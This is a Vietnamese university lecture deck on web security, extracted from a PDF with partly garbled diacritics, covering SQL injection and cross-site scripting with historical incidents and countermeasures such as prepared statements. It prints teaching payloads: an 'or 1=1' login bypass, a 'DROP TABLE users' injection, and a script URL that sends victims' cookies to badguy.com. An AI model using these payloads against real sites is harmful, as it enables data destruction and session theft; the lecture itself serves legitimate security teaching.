Bài giảng An toàn Hệ thống Thông tin - Bài: An toàn Web - Trần Đức Khánh

Download
An toàn Web  
Trn Đức Khánh  
Bmôn HTTT – Vin CNTT&TT  
ĐH BKHN  
An toàn Web  
oTn công SQL injection  
oTn công XSS  
SQL injection  
oSQL  
nStructured Query Language  
nNgôn ngtruy vn CSDL  
SQL injection  
SQL injection  
oTn công SQL Injection  
nstatement = SELECT * FROM users  
WHERE name = ‘ “ + userName +” ‘;”  
Điu gì xy ra nếu userName = hior 1=1  
SQL injection  
SQL injection  
oTn công SQL Injection  
nstatement = SELECT * FROM users  
WHERE name = ‘ “ + userName +” ‘;”  
Điu gì xy ra nếu userName = hi';DROP  
TABLE users;  
SQL injection  
o06/2005  
nTn công hthng th, 263000 thbị đánh  
cp, 43000000 thgp nguy cơ  
o06/2007  
nTn công bôi xu trang Microsoft UK  
o08/2007  
nTn công bôi xu trang LHQ  
o01/2008  
nHàng chc nghìn máy tính btn công vào  
MS SQL Server  
SQL injection  
oBin pháp ngăn chn  
nMc lp trình  
oKim soát cht chẽ đầu vào  
oLoi bcác ký tự đặc bit  
nmc CSDL  
oDùng lnh prepare để định dng câu truy  
vn  
nPhân tích tĩnh câu truy vn  
oPhát hin điu kin 1 = 1”  
nKim thử  
Tn công XSS  
oVí d  
nSearch: http://victim.com/search.php ?  
term = apple  
nSearch.php trli  
<HTML> <TITLE> Search Results </TITLE>  
<BODY>  
Results for <?php echo $_GET[term] ?> : ...  
</BODY>  
</HTML>  
oCó nguy cơ gì không?  
Tn công XSS  
oVn đề: không duyt đầu vào “term”  
http://victim.com/search.php ? term = <script>  
window.open( “http://badguy.com?cookie = ” +  
document.cookie ) </script>  
oĐiu gì xy ra nếu người dùng kích lên địa chỉ  
này  
nTrình duyt đi đến victim.com/search.php  
nvictim.com trv<HTML> Results for <script> ... </  
script>  
nTrình duyt gi cookie ca victim.com cho  
badguy.com  
Tn công XSS  
Tn công XSS  
oCách thc la người dùng kích vào  
liên kết độc hi  
nPhishing email  
nBanner qung cáo  
n...  
Tn công XSS  
oKhai thác  
nĐánh cp cookie (người dùng, mt khu,  
đặc quyn,…)  
nThc thi các script trong trình duyt như là  
ttrang ca nn nhân  
nLây nhim: sâu Samy trên mySpace.com  
oHu quả  
n80 % lhng an ninh mng được báo cáo  
nMc tiêu ln: google, facebook, mySpace,  
Yahoo, PayPal, eBay  
pdf 14 trang baolam 26/04/2022 8940
Download
Bạn đang xem tài liệu "Bài giảng An toàn Hệ thống Thông tin - Bài: An toàn Web - Trần Đức Khánh", để tải tài liệu gốc về máy hãy click vào nút Download ở trên

File đính kèm:

  • pdfbai_giang_mat_ma_va_ung_dung_bai_an_toan_web_tran_duc_khanh.pdf